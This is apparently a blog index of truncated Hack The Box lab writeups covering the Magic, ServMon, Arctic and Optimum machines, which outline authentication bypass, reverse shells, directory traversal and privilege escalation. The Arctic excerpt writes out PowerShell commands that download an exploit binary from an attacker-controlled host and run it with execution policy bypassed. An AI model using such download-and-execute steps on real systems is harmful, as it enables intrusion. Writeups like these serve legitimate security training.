Hackthebox Magic writeup 3.7 (6)

Hackthebox Magic writeup

Introduction It is a medium machine from the hack the box platform.Which has simple authentication bypass to upload a malicious file and then jumping a user followed by privilege escalation using SUID Steps involved 1-Port Scan2-Visiting website3-Authentication bypass4-Encoding php inside image5-Uploading malicious file and bypassing security check6-Uploading php reverse shell7-Getting full shell8-Getting db user creds9-Jumping … Read more

Hackthebox ServMon writeup 3.4 (5)

Hackthebox ServMon writeup

Basic Information Difficulty-EasyType -WindowsPoints-20Maker-dmw0ngUser Blood- sampriti:08 mins, 06 seconds. Root Blood-sampriti:34 mins, 10 seconds. Steps involved 1-Port Scanning2-Searching exploit for NVMS-10003-Directory Traversal(Using Burp just POC)4-FTP enumeration5-Extracting passwords Using Directory Traversal 6-SSH login into Nadine(user.tx)7-Revising FTP and Nmap enumerations8-Checking Service on port 84439-Local port forwarding through SSH10-Searching exploit for NSClient++11-Exploiting NSClient with CLI12-Getting Root.txt Commands involved … Read more

Hack the box Arctic writeup 2 (1)

Hack the box Arctic writeup

Steps involved 1-Port scanning2-Exploiting ColdFusion 8 on port 85003-Cracking hash4-uploading reverse shell5-privilage escalation 6-Getting root.txt Commands Used 1-nmap -sC -sV -O -p- -v -oV 10.10.10.112-hash-identifier3-john hash –wordlist=/root/Desktop/rockyou.txt4-echo $webclient = New-Object System.Net.WebClient >>wget.ps15-echo $url = “http://10.10.14.20:8000/Chimichurri.exe” >>wget.ps16-echo $file = “exploit.exe” >>wget.ps17- echo $webclient.DownloadFile($url,$file) >>wget.ps1 8-powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 Port Scanning Nmap 7.70 … Read more

Hack the box Optimum writeup 0 (0)

hack the box optimum writeup

Brief It is a easy windows machine from hack the box.It’s easy but root part is little hard and more enumeration is required for it.But once you get it’s so easy. It has only a single port .And the walk through is around HFS exploits using metasploit.And then privilege escalation through a integer overflow. Steps … Read more

wpChatIcon